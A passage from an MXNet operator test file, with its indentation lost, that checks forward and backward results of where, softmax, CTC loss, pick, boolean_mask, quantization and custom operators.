grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
